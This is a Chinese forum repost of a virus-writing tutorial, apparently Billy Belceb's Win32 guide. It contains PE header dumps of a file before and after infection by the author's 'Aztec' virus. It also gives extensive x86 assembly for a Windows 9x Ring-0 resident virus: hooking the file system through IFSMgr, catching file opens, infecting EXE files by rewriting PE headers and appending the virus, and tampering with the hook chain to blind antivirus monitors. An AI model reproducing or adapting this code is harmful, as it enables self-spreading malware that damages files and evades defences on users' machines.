‖O_DOS |O_PE ‖(Offset from Dos Header / PE Header
‖------|------‖
|0118H |0018H | Magic Value : 010BH (`Θ`)
|011AH |001AH | Major Linker Version : 2
|011BH |001BH | Minor Linker Version : 25
| | | Linker Version : 2.25
|011CH |001CH | Size of Code : 00001200H
|0120H |0020H | Size of Initialized Data : 00000600H
|0124H |0024H | Size of Uninitialized Data : 00000000H
|0128H |0028H | Address of Entry Point : 00001000H
|012CH |002CH | Base of Code (.text ofs.) : 00001000H
|0130H |0030H | Base of Data (.bss ofs.) : 00003000H
|0134H |0034H | Image Base : 00400000H
|0138H |0038H | Section Alignment : 00001000H
|013CH |003CH | File Alignment : 00000200H
|0140H |0040H | Major Operating System Version : 1
|0142H |0042H | Minor Operating System Version : 0
|0144H |0044H | Major Image Version : 0
|0146H |0046H | Minor Image Version : 0
|0148H |0048H | Major SubSystem Version : 3
|014AH |004AH | Minor SubSystem Version : 10
|014CH |004CH | Reserved Long : 00000000H
|0150H |0050H | Size of Image : 00006000H
|0154H |0054H | Size of Headers : 00000400H
|0158H |0058H | File Checksum : 00000000H
|015CH |005CH | SubSystem : 2
| | | Image runs in the Windows GUI subsystem
|015EH |005EH | DLL Characteristics : 0000H
|0160H |0060H | Size of Stack Reserve : 00100000H
|0164H |0064H | Size of Stack Commit : 00002000H
|0168H |0068H | Size of Heap Reserve : 00100000H
|016CH |006CH | Size of Heap Commit : 00001000H
|0170H |0070H | Loader Flags : 00000000H
|0174H |0074H | Number Directories : 00000010H
[...]
------- PE Section Headers ---------------------------------
---------------------------
‖O_DOS |O_PE ‖(Offset from Dos Header / PE Header
‖------|------‖[...]
|0270H |0170H | Section name : .reloc
|0278H |0178H | Physical Address : 00001000H
|027CH |017CH | Virtual Address : 00005000H
|0280H |0180H | Size of RAW data : 00000200H
|0284H |0184H | Pointer to RAW data : 00001C00H
|0288H |0188H | Pointer to relocations : 00000000H
|028CH |018CH | Pointer to line numbers : 00000000H
|0290H |0190H | Number of Relocations : 0000H
|0292H |0192H | Number of line numbers : 0000H
|0294H |0194H | Characteristics : 50000040H
| | | ?Section contains initialized data.
| | | ?Section is shareable.
| | | ?Section is readable.
| | |
‖______|______‖
这是一个正常文件,没有被感染。下面是同一个文件,但是被我的Aztec病毒(一个Ring-3病毒例子,看下面的)感染了。
作者: x86 时间: 2006-3-22 14:02 标题: [转帖]Billy Belceb病毒编写教程---Win32篇
------------ DOS INFORMATION -----------------------------------------------------------------
Analyzed 文件: GOAT002.EXE
DOS Reports:
?File Size - 2600H (09728d)
?File Time - 23:20:58 (hh:mm:ss)
?File Date - 22/06/1999 (dd/mm/yy)
?Attributes : Archive
[...]
-------------- PE Header -----------------------------------------------------------------
---------------
‖O_DOS |O_PE ‖(Offset from Dos Header / PE Header
‖------|------‖[...]
|0100H |0000H | PE Header Signature - PE/0/0
|0104H |0004H | The machine for this EXE is Intel 386 (value = 014CH)
|0106H |0006H | Number of sections in the file - 0004H
|0108H |0008H | File was linked at : 23/03/2049
|010CH |000CH | Pointer to Symbol Table : 00000000H
|0110H |0010H | Number of Symbols : 00000000H
|0114H |0014H | Size of the Optional Header : 00E0H
| | |
|0116H |0016H | File Characteristics - 818EH :
| | | ?File is executable
| | | ?Line numbers stripped from file
| | | ?Local symbols stripped from file
| | | ?Bytes of machine word are reversed
| | | ?32 bit word machine
| | | ?Bytes of machine word are reversed
‖_____|_______‖
--------- PE Optional Header ------------------------------------------------------
---------------
‖O_DOS |O_PE ‖(Offset from Dos Header / PE Header
‖------|------‖
|0118H |0018H | Magic Value : 010BH
| | |
|011AH |001AH | Major Linker Version : 2
|011BH |001BH | Minor Linker Version : 25
| | | Linker Version : 2.25
|011CH |001CH | Size of Code : 00001200H
|0120H |0020H | Size of Initialized Data : 00000600H
|0124H |0024H | Size of Uninitialized Data : 00000000H
|0128H |0028H | Address of Entry Point : 00005200H
|012CH |002CH | Base of Code (.text ofs.) : 00001000H
|0130H |0030H | Base of Data (.bss ofs.) : 00003000H
|0134H |0034H | Image Base : 00400000H
|0138H |0038H | Section Alignment : 00001000H
|013CH |003CH | File Alignment : 00000200H
|0140H |0040H | Major Operating System Version : 1
|0142H |0042H | Minor Operating System Version : 0
|0144H |0044H | Major Image Version : 0
|0146H |0046H | Minor Image Version : 0
|0148H |0048H | Major SubSystem Version : 3
|014AH |004AH | Minor SubSystem Version : 10
|014CH |004CH | Reserved Long : 43545A41H
|0150H |0050H | Size of Image : 00006600H
|0154H |0054H | Size of Headers : 00000400H
|0158H |0058H | File Checksum : 00000000H
|015CH |005CH | SubSystem : 2
| | | -Image runs in the Windows GUI subsystem
|15EH |005E | DLL Characteristics : 0000H
|160H |0060H | Size of Stack Reserve : 00100000H
|0164H |0064H | Size of Stack Commit : 00002000H
|0168H |0068H | Size of Heap Reserve : 00100000H
|016CH |006CH | Size of Heap Commit : 00001000H
|0170H |0070H | Loader Flags : 00000000H
|0174H |0074H | Number Directories : 00000010H
‖___________‖
[...]
---------PE Section Headers------------------------------------------
----------------
‖O_DOS |O_PE ‖(Offset from Dos Header / PE Header
‖------|------‖[...]
|0270H |0170H | Section name : .reloc
|0278H |0178H | Physical Address : 00001600H
|027CH |017CH | Virtual Address : 00005000H
|0280H |0180H | Size of RAW data : 00001600H
|0284H |0184H | Pointer to RAW data : 00001C00H
|0288H |0188H | Pointer to relocations : 00000000H
|028CH |018CH | Pointer to line numbers : 00000000H
|0290H |0190H | Number of Relocations : 0000H
|0292H |0192H | Number of line numbers : 0000H
|0294H |0194H | Characteristics : F0000060H
| | | -Section contains code.
| | | -Section contains initialized data.
| | | -Section is shareable.
| | | -Section is executable.
| | | -Section is readable.
| | | -Section is writeable.
| | |
|_______|______|
那一个正常的文件,没有被感染。下面给出的是同一个文件,但是被我的Aztec(Ring-3例子病毒,看下文)感染了。
---------------------------------------------------------------------------------------------------
-------DOS INFORMATION -------------------------------------------------
Analyzed 文件: GOAT002.EXE
DOS Reports:
?File Size - 2600H (09728d)
?File Time - 23:20:58 (hh:mm:ss)
?File Date - 22/06/1999 (dd/mm/yy)
?Attributes : Archive
[...]
-------PE Header-------------------------------------------------------
----------------
‖O_DOS |O_PE ‖(Offset from Dos Header / PE Header
‖------|-------‖
|0100H |0000H | PE Header Signature - PE/0/0
|0104H |0004H | The machine for this EXE is Intel 386 (value = 014CH)
|0106H |0006H | Number of sections in the file - 0004H
|0108H |0008H | File was linked at : 23/03/2049
|010CH |000CH | Pointer to Symbol Table : 00000000H
|0110H |0010H | Number of Symbols : 00000000H
|0114H |0014H | Size of the Optional Header : 00E0H
| | |
|0116H |0016H | File Characteristics - 818EH :
| | | -File is executable
| | | -Line numbers stripped from file
| | | -Local symbols stripped from file
| | | -Bytes of machine word are reversed
| | | -32 bit word machine
| | | -Bytes of machine word are reversed
|______|_______|
---------PE Optional Header---------------------------------------
-----------------
‖O_DOS |O_PE ‖(Offset from Dos Header / PE Header
‖-------|-------‖
|0118H |0018H | Magic Value : 010BH
|011AH |001AH | Major Linker Version : 2
|011BH |001BH | Minor Linker Version : 25
| | | Linker Version : 2.25
|011CH |001CH | Size of Code : 00001200H
|0120H |0020H | Size of Initialized Data : 00000600H
|0124H |0024H | Size of Uninitialized Data : 00000000H
|0128H |0028H | Address of Entry Point : 00005200H
|012CH |002CH | Base of Code (.text ofs.) : 00001000H
|0130H |0030H | Base of Data (.bss ofs.) : 00003000H
|0134H |0034H | Image Base : 00400000H
|0138H |0038H | Section Alignment : 00001000H
|013CH |003CH | File Alignment : 00000200H
|0140H |0040H | Major Operating System Version : 1
|0142H |0042H | Minor Operating System Version : 0
|0144H |0044H | Major Image Version : 0
|0146H |0046H | Minor Image Version : 0
|0148H |0048H | Major SubSystem Version : 3
|014AH |004AH | Minor SubSystem Version : 10
|014CH |004CH | Reserved Long : 43545A41H
|0150H |0050H | Size of Image : 00006600H
|0154H |0054H | Size of Headers : 00000400H
|0158H |0058H | File Checksum : 00000000H
|015CH |005CH | SubSystem : 2
| | | -Image runs in the Windows GUI subsystem
|015EH |005EH | DLL Characteristics : 0000H
|0160H |0060H | Size of Stack Reserve : 00100000H
|0164H |0064H | Size of Stack Commit : 00002000H
|0168H |0068H | Size of Heap Reserve : 00100000H
|016CH |006CH | Size of Heap Commit : 00001000H
|0170H |0070H | Loader Flags : 00000000H
|0174H |0074H | Number Directories : 00000010H
|_______|_______|
[...]
----------PE Section Headers---------------------------------------
-----------------
‖O_DOS | O_PE ‖(Offset from Dos Header / PE Header
‖-------|-------‖[...]
|0270H | 0170H | Section name : .reloc
|0278H | 0178H | Physical Address : 00001600H
|027CH | 017CH | Virtual Address : 00005000H
|0280H | 0180H | Size of RAW data : 00001600H
|0284H | 0184H | Pointer to RAW data : 00001C00H
|0288H | 0188H | Pointer to relocations : 00000000H
|028CH | 018CH | Pointer to line numbers : 00000000H
|0290H | 0190H | Number of Relocations : 0000H
|0292H | 0192H | Number of line numbers : 0000H
|0294H | 0194H | Characteristics : F0000060H
| | | -Section contains code.
| | | -Section contains initialized data.
| | | -Section is shareable.
| | | -Section is executable.
| | | -Section is readable.
| | | -Section is writeable.
| | |
|_______|_______|
--------------------------------------------------------------------------------
好了,我希望这已经帮助你更理解在通过增加它的最后一节来感染PE文件的时候,做了些什么。为了避免你在比较这些每一个表时花更多的精力,我给出了一个列表:
InterruptHandler:
pushad ; Push 所有寄存器
push virus_size+1024 ; 我们需要的内存 (virus_size+buffer)
; 当你使用缓冲区的时候,更好
; 把它加上更多的字节
@@1: VxDCall IFSMgr_GetHeap
pop ecx
够清楚了吧?正如DDK所说的,如果它失败了,它将在EAX中返回给我们0,所以检查可能的失败。接下来的POP非常重要,因为VxD的大多数服务不修正堆栈,所以我们在调用VxD函数之前压栈的值还在堆栈中。
or eax,eax ; cmp eax,0
jz back2ring3
如果函数成功了,我们在EAX中得到了我们必须移动的病毒主体的地址,那么Let';s go!
mov byte ptr [ebp+semaphore],0 ; Coz infection puts it in 1
mov edi,eax ; Where move virus
lea esi,ebp+start ; What to move
push eax ; Save memory address for later
sub ecx,1024 ; We move only virus_size
rep movsb ; Move virus to its TSR location ;)
pop edi ; Restore memory address
我们在一个内存地址中的是病毒,准备TSR的,对吗?而且在EDI中是病毒在内存中开始的地址,所以我们可以把它作为下个函数的delta offset:)好了,我们现在需要hook文件系统了对吗?OK,有一个函数可以做这个工作。很惊讶,是把? Micro$oft微软工程师为我们做了累活。
---------------------------------------------------------------------------
** IFSMgr_InstallFileSystemApiHook - 安装一个文件系统 api hook
这个服务为调用者安装一个文件系统api hook。这个hook在IFS manager 和一个FSD之间,钩子可以看任何IFS manager对FSD的任何调用。
这个函数使用C6 386 _cdecl 调用顺序
ppIFSFileHookFunc
IFSMgr_InstallFileSystemApiHook( pIFSFileHookFunc HookFunc )
入口 TOS - 将要安装作为钩子的函数的地址
出口 EAX - 指向在这个链中的包含以前钩子的地址变量
使用 C 寄存器
---------------------------------------------------------------------------
清楚了吧?如果不,我希望你在看了一些代码之后,理解了它。好了,让我们钩住文件系统(hook FileSystem)...
lea ecx,[edi+New_Handler] ; (vir address in mem + handler offs)
push ecx ; Push it
@@2: VxDCall IFSMgr_InstallFileSystemApiHook ; Perform the call
pop ecx ; Don';t forget this, guy
mov dword ptr [edi+Old_Handler],eax ; EAX=Previous hook
back2ring3:
popad
iretd ; return to Ring-3. Yargh
好了,我们已经看完了Ring-0病毒的安装部分。现在,我们必须编写文件系统(FileSystem)的处理部分了:)简单,但是否如你所想?:)
FileSystem Handler:真正有趣!!!
耶,下面是驻留感染它自己,但是我们在开始之前不得不做些事情。首先,我们必须对堆栈做一个安全拷贝,也就是说保存ESP内容到EBP寄存器中。然后,我们应该把ESP减去20h,为了修正堆栈指针。让我们看看一些代码:
New_Handler equ $-(offset virus_start)
FSA_Hook:
push ebp ; Save EBP content 4 further restorin
mov ebp,esp ; Make a copy of ESP content in EBP
sub esp,20h ; And fix the stack
现在,因为我们的函数要被系统用一些参数调用,我们应该push它们,就像原先的处理程序所做的。要push的参数从EBP+08h到EBP+1Ch,包含它们,并和IOREQ结构相关。
push dword ptr [ebp+1Ch] ; pointer to IOREQ structure.
push dword ptr [ebp+18h] ; codepage that the user string was
; passed in on.
push dword ptr [ebp+14h] ; kind of resource the operation is
; being performed on.
push dword ptr [ebp+10h] ; the 1-based drive the operation is
; being performed on (-1 if UNC).
push dword ptr [ebp+0Ch] ; function that is being performed.
push dword ptr [ebp+08h] ; address of the FSD function that
; is to be called for this API.
现在,我们已经把应该push的参数push到正确的地方了,所以对它们不要再担心了。现在,我们必须检查你将要操作的IFSFN函数。下面你得到的是最重要的小列表:
-------------------------------------------------------------------------------
** 传送给 IFSMgr_CallProvider 的IFS函数ID
IFSFN_READ equ 00h ; read a file
IFSFN_WRITE equ 01h ; write a file
IFSFN_FINDNEXT equ 02h ; LFN handle based Find Next
IFSFN_FCNNEXT equ 03h ; Find Next Change Notify
IFSFN_SEEK equ 0Ah ; Seek file handle
IFSFN_CLOSE equ 0Bh ; close handle
IFSFN_COMMIT equ 0Ch ; commit buffered data for handle
IFSFN_FILELOCKS equ 0Dh ; lock/unlock byte range
IFSFN_FILETIMES equ 0Eh ; get/set file modification time
IFSFN_PIPEREQUEST equ 0Fh ; named pipe operations
IFSFN_HANDLEINFO equ 10h ; get/set file information
IFSFN_ENUMHANDLE equ 11h ; enum file handle information
IFSFN_FINDCLOSE equ 12h ; LFN find close
IFSFN_FCNCLOSE equ 13h ; Find Change Notify Close
IFSFN_CONNECT equ 1Eh ; connect or mount a resource
IFSFN_DELETE equ 1Fh ; file delete
IFSFN_DIR equ 20h ; directory manipulation
IFSFN_FILEATTRIB equ 21h ; DOS file attribute manipulation
IFSFN_FLUSH equ 22h ; flush volume
IFSFN_GETDISKINFO equ 23h ; query volume free space
IFSFN_OPEN equ 24h ; open file
IFSFN_RENAME equ 25h ; rename path
IFSFN_SEARCH equ 26h ; search for names
IFSFN_QUERY equ 27h ; query resource info (network only)
IFSFN_DISCONNECT equ 28h ; disconnect from resource (net only)
IFSFN_UNCPIPEREQ equ 29h ; UNC path based named pipe operation
IFSFN_IOCTL16DRIVE equ 2Ah ; drive based 16 bit IOCTL requests
IFSFN_GETDISKPARMS equ 2Bh ; get DPB
IFSFN_FINDOPEN equ 2Ch ; open an LFN file search
IFSFN_DASDIO equ 2Dh ; direct volume access
-------------------------------------------------------------------------------
对我们来说的第一件事,我们感兴趣的唯一的函数是24h,那就是说打开。系统几乎每时每刻都在调用那个函数,所以对它没有任何问题。为这个编码就和你能想象的一样简单:)
cmp dword ptr [ebp+0Ch],24h ; Check if system opening file
jnz back2oldhandler ; If not, skip and return to old h.
现在开始有意思的。我们知道这里系统请求文件打开,所以现在该我们了。首先,我们应该检查我们是否在进行我们自己的调用...简单,仅仅加一个小变量,它将出现一些问题。Btw,我几乎忘了,获得delta offset :)
pushad
call ring0_delta ; Get delta offset of this
ring0_delta:
pop ebx
sub ebx,offset ring0_delta
cmp byte ptr [ebx+semaphore],00h ; Are we the ones requesting
jne pushnback ; the call?
inc byte ptr [ebx+semaphore] ; For avoid process our own calls
pushad
call prepare_infection ; We';ll see this stuff later
call infection_stuff
popad
dec byte ptr [ebx+semaphore] ; Stop avoiding :)
pushnback:
popad
现在我将继续介绍处理程序本身,然后,我将解释我是怎么做这些例程的,prepare_infection 和 infection_stuff。如果系统正在请求一个调用,我们就退出我们将要处理的例程,OK?现在,我们必须编写调用旧的FileSystem hook的例程。当你还记得(我假设你没有alzheimer),我们push了所有参数,所以我们该做的唯一的事情是装到寄存器中,旧地址没关系,然后调用那个内存位置。然后,我们把ESP加18h(为了能够获得返回地址),完了。你将最好看看一些代码,所以,你将看到:
back2oldhandler:
db 0B8h ; MOV EAX,imm32 opcode
Old_Handler equ $-(offset virus_start)
dd 00000000h ; here goes the old handler.
call [eax]
add esp,18h ; Fix stack (6*4)
leave ; 6 = num. paramz. 4 = dword size.
ret ; Return
感染准备
^^^^^^^^
这是Ring-0代码的主要部分的一方面。让我们现在看看Ring-0编写代码的细节。当我们在钩子处理中的时候,有两个调用,对吗?这不是必须的,但是我为了使代码更简单,那么做了,因为我喜欢使事情结构化。
在第一次调用的时候,我调用的prepare_infection仅仅因为一个原因做了一件事情。系统作为一个参数给我们的文件名,但是我们有一个问题。系统以UNICODE形式给我们的,而且对我们来说它没有什么用。所以,我们需要把它转换成ASCII码,对吗?我们有一个VxD服务可以为我们做这件事。它的名字:UniToBCSParh。下面是你喜欢的源代码。
prepare_infection:
pushad ; Push all
lea edi,[ebx+fname] ; Where to put ASCII file name
mov eax,[ebp+10h]
cmp al,0FFh ; Is it in UNICODE?
jz wegotdrive ; Oh, yeah!
add al,"@" ; Generate drive name
stosb
mov al,":" ; Add a :
stosb
wegotdrive:
xor eax,eax
push eax ; EAX = 0 -> Convert to ASCII
mov eax,100h
push eax ; EAX = Size of string to convert
mov eax,[ebp+1Ch]
mov eax,[eax+0Ch] ; EAX = Pointer to string
add eax,4
push eax
push edi ; Push offset to file name
@@3: VxDCall UniToBCSPath
add esp,10h ; Skip parameters returnet
add edi,eax
xor eax,eax ; Make string null-terminated
stosb
popad ; Pop all
ret ; Return
感染本身
^^^^^^^^
下面我将告诉你怎样到达直到你你必须的应用感染后的文件应该有的新的PE头和节头的值。但是,我不会解释怎么操作它们了,不是因为我懒,仅仅是因为这是Ring-0代码编写一章,而不是PE感染一章。这个部分和FileSystem 钩子代码的infection_stuff 部分相符。首先,我们必须检查我们将要操作的文件是否是一个.EXE文件还是其它不感兴趣的文件。所以,首先,我们必须在文件名字里寻找0值,它告诉我们它的末尾。这编写起来很简单:
infection_stuff:
lea edi,[ebx+fname] ; Variable with the file name
getend:
cmp byte ptr [edi],00h ; End of filename?
jz reached_end ; Yep
inc edi ; If not, search for another char
jmp getend
reached_end:
我们在EDI里是ASCII字符串里的0值,正如你知道的,它标志着字符串的结尾,也就是在这种情况下,文件名。下面是我们的主要检查,看看它是否是一个.EXE文件,如果它不是,跳过感染。我们还可以检查.SCR(Windows屏保),正如你知道的,它们也是可执行文件...这就是你的选择。下面给你一些代码:
cmp dword ptr [edi-4],"EXE." ; Look if extension is an EXE
jnz notsofunny
正如你能看到的,我比较了EDI-5次。
现在我们知道了那个文件是一个EXE文件:)所以该是移除它的属性,打开文件,修改相关域,关闭文件并恢复属性的时候了。所有这些函数由另外一个IFS服务完成,那就是IFSMgr_Ring0_FileIO。我没有找到关于全部这个的文档,总之也没有必要,它有很多的函数,正如我以前所说的,所有我们需要函数仅仅是为了进行文件感染。让我们VxD服务IFSMgr_Ring0_FileIO传送到EAX中的数值:
-----------------------------------------------------------------------
;函数定义在ring-0的API函数列表中:
;说明:大多数函数是上下文相关的,除非被明确的规定了,也就是说,它们不使用当前线程的上下文。;R0_LOCKFILE是唯一的例外-它总是使用当前线程的上下文。
R0_OPENCREATFILE equ 0D500h ; Open/Create a file
R0_OPENCREAT_IN_CONTEXT equ 0D501h ; Open/Create file in current contxt
R0_READFILE equ 0D600h ; Read a file, no context
R0_WRITEFILE equ 0D601h ; Write to a file, no context
R0_READFILE_IN_CONTEXT equ 0D602h ; Read a file, in thread context
R0_WRITEFILE_IN_CONTEXT equ 0D603h ; Write to a file, in thread context
R0_CLOSEFILE equ 0D700h ; Close a file
R0_GETFILESIZE equ 0D800h ; Get size of a file
R0_FINDFIRSTFILE equ 04E00h ; Do a LFN FindFirst operation
R0_FINDNEXTFILE equ 04F00h ; Do a LFN FindNext operation
R0_FINDCLOSEFILE equ 0DC00h ; Do a LFN FindClose operation
R0_FILEATTRIBUTES equ 04300h ; Get/Set Attributes of a file
R0_RENAMEFILE equ 05600h ; Rename a file
R0_DELETEFILE equ 04100h ; Delete a file
R0_LOCKFILE equ 05C00h ; Lock/Unlock a region in a file
R0_GETDISKFREESPACE equ 03600h ; Get disk free space
R0_READABSOLUTEDISK equ 0DD00h ; Absolute disk read
R0_WRITEABSOLUTEDISK equ 0DE00h ; Absolute disk write
-----------------------------------------------------------------------
迷人的函数,是吧?:)如果我们看看,它提醒了我们DOS int 21h函数。但是这个更好:)
好了,让我们保存旧的文件属性。正如你能看到的,这个函数是在我以前给你的列表中的,我们把这个参数(4300h)放到EAX中为了获得文件的属性到ECX中。所以,在那之后,我push它和文件名,它在ESI中。
lea esi,[ebx+fname] ; Pointer to file name
mov eax,R0_FILEATTRIBUTES ; EAX = 4300h
push eax ; Save it goddamit
VxDCall IFSMgr_Ring0_FileIO ; Get attributes
pop eax ; Restore 4300h from stack
jc notsofunny ; Something went wrong (?)
push esi ; Push pointer to file name
push ecx ; Push attributes
现在我们必须把它们去掉。没问题。设置文件属性的函数是,以前在IFSMgr_Ring0_FileIO中,但是现在是4301h。就像你在DOS下看到的这个值:)
inc eax ; 4300h+1=4301h :)
xor ecx,ecx ; No attributes sucker!
VxDCall IFSMgr_Ring0_FileIO ; Set new attributes (wipe';em)
jc stillnotsofunny ; Error (?!)
现在我们有一个没有属性的等着我们的文件了...我们该做什么呢?呵呵,我认为你是聪明的。让我们打开它!:)就像所有病毒中的这个部分一样,我们不得不调用IFSMgr_Ring0_FileIO,但是现在为打开文件传送到EAX中的是D500h。
lea esi,[ebx+fname] ; Put in ESI the file name
mov eax,R0_OPENCREATFILE ; EAX = D500h
xor ecx,ecx ; ECX = 0
mov edx,ecx
inc edx ; EDX = 1
mov ebx,edx
inc ebx ; EBX = 2
VxDCall IFSMgr_Ring0_FileIO
jc stillnotsofunny ; Shit.
xchg eax,ebx ; Optimize a bit, sucka! :)
现在我们在EBX中的是打开文件的句柄,所以如果你在文件关闭之前不使用这个文件将会完美,好吗?:)现在该是你读PE文件头并保存它(和操作它)的时候了,然后更新文件头,附加上病毒...这里我将仅仅解释怎样处理PE头的属性,因为它是这个教程的另外一部分了,而且我不想太多重复。我打算解释如何把PE头保存到我们的缓冲区中。它相当简单:如果你还记得,PE头从偏移地址3Ch(当然是从BOF开始)开始。然后我们必须读4字节(这个3Ch处的DWORD),并在这个偏移地址处再次读,这次,是400h字节,足够处理整个PE头了。正如你能想象的,读文件中的函数是在很棒的IFSMgr_Ring0_FileIO中,而且你可以看到我以前给你的表中的正确号码,在R0_READFILE中。传递给这个函数的参数如下:
EAX = R0_READFILE = D600h
EBX = File Handle
ECX = Number of bytes to read
EDX = Offset where we should read
ESI = Where will go the read bytes
call inf_delta ; 如果你还记得,我们在EBX中是delta offset
inf_delta: ; 但是打开文件之后,我们在EBX中是文件的句柄
pop ebp ; 所以我们必须重新计算它。
sub ebp,offset inf_delta ;
mov eax,R0_READFILE ; D600h
push eax ; Save it for later
mov ecx,4 ; Bytes to read, a DWORD
mov edx,03Ch ; Where read (BOF+3Ch)
lea esi,[ebp+pehead] ; There goez the PE header offzet
VxDCall IFSMgr_Ring0_FileIO ; The VxDCall itself
pop eax ; restore R0_READFILE from stack
mov edx,dword ptr [ebp+pehead] ; Where the PE header begins
lea esi,[ebp+header] ; Where write the read PE header
mov ecx,400h ; 1024 bytes, enough for all PE head.
VxDCall IFSMgr_Ring0_FileIO
现在我们通过看它的标志要看看我们刚才打开的文件是否是一个PE文件。我们在ESI中的是指向我们放置PE头的缓冲区,所以只要把ESI中的第一个DWORD和PE,0,0作比较即可(或者简单的用WORD和PE进行比较) ;)
cmp dword ptr [esi],"EP" ; 它是PE吗?
jnz muthaf##ka
现在你该检查以前的感染了,如果以前已经感染过了,只要到诸如关闭文件的地方即可。正如我以前所说的,我将跳过修改PE头的代码,因为假设你已经知道怎么做了。好了,想象一些你已经合适地修改了缓冲区里的PE头(在我的代码里,变量叫做header)。现在该是把新的头写到PE文件里的时候了。寄存器里的值应该是和
R0_READFILE函数差不多的,我将这样写它们:
EAX = R0_WRITEFILE = D601h
EBX = File Handle
ECX = Number of bytes to write
EDX = Offset where we should write
ESI = Offset of the bytes we want to write
mov eax,R0_WRITEFILE ; D601h
mov ecx,400h ; write 1024 bytez (buffer)
mov edx,dword ptr [ebp+pehead] ; where to write (PE offset)
lea esi,[ebp+header] ; Data to write
VxDCall IFSMgr_Ring0_FileIO
我们已经写完了头。现在,我们只要添加病毒即可。我决定把它添在EOF目录中,因为我的修改PE的方式...好了,我是用这种方法做的。但是不要担心,应用的的感染方法是很简单的,因为我假设你已经理解它是怎么工作的了。就在附加病毒主体之前,记住我们应该修正所有的VxDCall,因为它们在调用的时候在内存中已经改变了。记住,我在这篇教程里面教给你的VxD修正过程。另外,当我们在EOF处添加的时候,我们应该知道它占多少字节。相当简单,我们在IFSMgr_Ring0_FileIO中有一个函数(为什么不呢!)来做这个工作:R0_GETFILESIZE让我们看看它的输入参数:
EAX = R0_GETFILESIZE = D800h
EBX = File Handle
在EAX中返回给我们的是句柄对应的文件的大小,也就是我们试图感染的文件。
call VxDFix ; Re-make all INT 20h';s
mov eax,R0_GETFILESIZE ; D800h
VxDCall IFSMgr_Ring0_FileIO
; EAX = File size
mov edx,R0_WRITEFILE ; EDX = D601h
xchg eax,edx ; EAX = D601; EDX = File size
lea esi,[ebp+virus_start] ; What to write
mov ecx,virus_size ; How much bytez to write
VxDCall IFSMgr_Ring0_FileIO
只剩下一些事情去做了。只要关闭文件并恢复它的旧的属性即可。当然关闭文件的函数是我们热爱的IFSMgr_Ring0_FileIO了,现在是函数D700h。让我们看看它的输入参数:
EAX = R0_CLOSEFILE = 0D700h
EBX = File Handle
现在是它的代码:
muthaf##ka:
mov eax,R0_CLOSEFILE
VxDCall IFSMgr_Ring0_FileIO
好了,只剩下一件事情去做了。恢复旧的属性。
stillnotsofunny:
pop ecx ; Restore old attributos
pop esi ; Restore ptr to FileName
mov eax,4301h ; Set attributes function
VxDCall IFSMgr_Ring0_FileIO
notsofunny:
ret
终于完了! :) 另外,所有的这些"VxDCall IFSMgr_Ring0_FileIO"最好在一个子例程中,用一个简单的call来调用它:它更优化了(如果你你使用我给你的VxDCall宏),它更好是因为只要把一个偏移放在VxDFix的表中就可以了。
%反VxD监视代码%
~~~~~~~~~~~~~~~
我必须不能忘记发现这个的人:Super/29A。此外,我应该解释这个东西是怎么回事。它和已经见过的InstallFileSystemApiHook服务有关,但是它没有被Micro$oft写成文档。InstallFileSystemApiHook服务返回给我们一个有意思的结构:
EAX + 00h -> Address of previous handler
EAX + 04h -> Hook_Info structure
而且正如你所想的,最重要的是Hook_Info 结构:
00h -> 钩子处理的地址, 这个结构的第一个
04h -> 先前钩子处理的地址
08h -> 先前钩子的Hook_Info的地址
所以,我们对这个结构进行递归搜索直到找到了第一个,被监视程序使用的链的顶部...然后我们必须修改它。代码?下面给出一部分 :)
; EDI = Points to virus copy in system heap
lea ecx,[edi+New_Handler] ; Install FileSystem Hook
push ecx
@@2: VxDCall IFSMgr_InstallFileSystemApiHook
pop ecx
xchg esi,eax ; ESI = Ptr actual hook
; handler
push esi
lodsd ; add esi,4 ; ESI = Ptr to Hook Handler
tunnel: lodsd ; EAX = Previous Hook Handler
; ESI = Ptr to Hook_Info
xchg eax,esi ; Very clear :)
add esi,08h ; ESI = 3rd dword in struc:
; previous Hook_Info
js tunnel ; If ESI < 7FFFFFFF, it was
; the last one :)
; EAX = Hook_Info of the top
; chain
mov dword ptr [edi+ptr_top_chain],eax ; Save in its var in mem
pop eax ; EAX = Last hook handler
[...]
如果你不懂,不要担心,这是第一次:想象一下我读懂Sexy的代码所花的时间!好了,我们已经把链顶存在一个变量里了。接下来的的代码片断是我们检查一个系统打开文件的请求,而且我们知道这个调用不是由我们的病毒所做的,只是在调用感染程序之前。
lea esi,dword ptr [ebx+top_chain] ; ESI = Ptr to stored variable
lodsd ; EAX = Top Chain
xor edx,edx ; EDX = 0
xchg [eax],edx ; Top Chain = NULL
; EDX = Address of Top Chain
pushad
call Infection
popad
mov [eax],edx ; Restore Top Chain
这个简单多了,啊?:)所有的概念("Hook_Info", "Top Chain", 等等)都是来自于Super,所以去惩罚一下他:) 作者: x86 时间: 2006-3-22 14:06 标题: [转帖]Billy Belceb病毒编写教程---Win32篇
%最后的话%
~~~~~~~~~~
我必须感谢3个在我编写第一个Ring-0的东东帮助过我的最重要的人:Super,Vecna和nIgr0(你们是好样的!)。好了,还有其它事情要说吗?呃...耶。Ring-0是我们在Win9X下的美梦,是的。但是总是有限制。如果我们,毒客们,找到了一个在系统中如NT或者将来的Win2000(NT5)下获取Ring-0特权的时候,就没关系了。Micro$oft将会做一个补丁或者一个Service Pack来修复所有这些可能的bug。无论如何,编写一个Ring-0病毒总是很有趣。对我来说经历确实有意思,并且帮助我知道了更多关于Windows内部结构的东西。系统几乎是胡乱的打开文件。只要看看其中的一个最多,最快的,传播最广的病毒是一个Ring-0病毒,CIH。
【每一线程驻留(Per-Process residency)】
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
一个用来讨论的非常有意思的话题:Per-Process residency,对所有的Win32平台都适用的一种方法。我已经把这一章从Ring-3那一章分离开来是因为我想它是一中进化,对于初学Ring-3来说也是稍微复杂了些。
%介绍%
~~~~~~
per-process residence首先由29A的Jacky Qwerty在1997年编写的。此外(对媒体来说,不是真正的-Win32.Jacky)它是第一个Win32病毒,它还是第一个Win32驻留病毒,使用从没见过的技术:per-process residence。那么你想知道"什么是per-process residence呢?"。我已经在DDT#1的一篇文章中解释了那个了,但是这里我将对这个方法作一个更深的分析。首先,你必须知道什么是Win32,和它的PE可执行文件是怎么工作的。当你调用一个API的时候,你将要调用一个由系统在运行期把Import Table(输入表)保存到内存的地址,这个输入表指向API在DLL中的入口点。为了作一个per-process驻留,你将要不得不对输入表做些手脚,并修改你想要钩住并指向你自己的代码的API地址值,这个代码能够处理指定的API,也就是说由API来处理感染文件。我知道这有一点点杂乱,但是正如在病毒代码编写的每一件事情中,开始总是看起来很难的,但是后面就非常简单了:)
